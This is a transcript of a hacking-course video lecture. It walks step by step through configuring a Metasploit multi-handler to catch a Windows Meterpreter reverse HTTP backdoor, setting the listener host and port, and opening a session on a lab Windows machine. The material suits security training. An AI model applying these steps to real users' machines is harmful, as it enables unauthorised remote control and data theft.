Hello again. In the last lecture, I have shown you how to generate the backdoor. In this lecture, I'd like to show you how to use it and how to start listening to this backdoor if the target machine has opened it. So we need to go to command line as usual, and we need to use for this purpose Metasploit framework MSF console. So this is a very useful tool. So this is the main screen for the tool, and to start listening to the backdoor you have already generated, the first thing you need to write is use exploit multi-handler enter. Then here if you write help, you can see the options which you can use for this. So for example, let's write options to display the options we have. Options. The first thing we need to configure in this tool is the payload. So as you remember, in the last time we have used Meterpreter reverse HTTP, so we have to use it here. So we need to write set payload, the payload name Windows Meterpreter reverse HTTP. Then if we write now options again, you can find this. If you want to see all the modules names, so you can just write set payload, and you can tab twice the tab button. So it's telling, do you want to display all the 519 possibilities? Yes, just for you to see which payload you want to use according to your previous usage, whether you are trying to hack an Android, Apple or Windows or whatever, or Windows. So for our backdoor we have chosen Windows Meterpreter reverse. Then here we'll write options. So now it's asking us to change the L host and L port as we have done. As usual, we will use set to change the options, L host, and here it's not case sensitive. You can write just anything, L host, and it's the IP of the Kali machine 104, and to make sure it is 104, just write ifconfig, and this is the one. Okay, enter. Then we need to change the port. Last time I have chosen 8080, but for some reason it stopped working, so I have changed it to 4444. You can choose just any port, so we need to do the same, set L port 4444, enter. Now again if we write show options, so now it's done as we need it. Then we write exploit to start listening to the file. Let's say my Windows machine is the target machine. So if the target user open this file, what you can see here, the session started, and let's say we want to know the system information, just we need to write sysinfo. So here we go. We have just accessed the machine, and through Meterpreter we can do many cool things, and I'll show it to you in the next lecture.